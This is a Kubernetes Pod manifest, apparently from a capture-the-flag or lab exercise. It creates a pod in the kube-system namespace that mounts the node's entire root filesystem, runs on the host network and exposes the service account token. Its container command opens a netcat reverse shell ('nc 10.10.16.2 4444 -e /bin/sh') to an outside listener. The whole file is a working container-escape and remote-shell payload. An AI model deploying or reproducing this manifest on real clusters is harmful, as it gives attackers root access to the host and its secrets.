apiVersion: v1 
kind: Pod
metadata:
  name: baturu11
  namespace: kube-system
spec:
  containers:
  - name: baturu11
    image: localhost:5000/dev-alpine
    command: ["/bin/sh"]
    args: ["-c", "nc 10.10.16.2 4444 -e /bin/sh"]
    volumeMounts: 
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:  
      path: /
  automountServiceAccountToken: true
  hostNetwork: true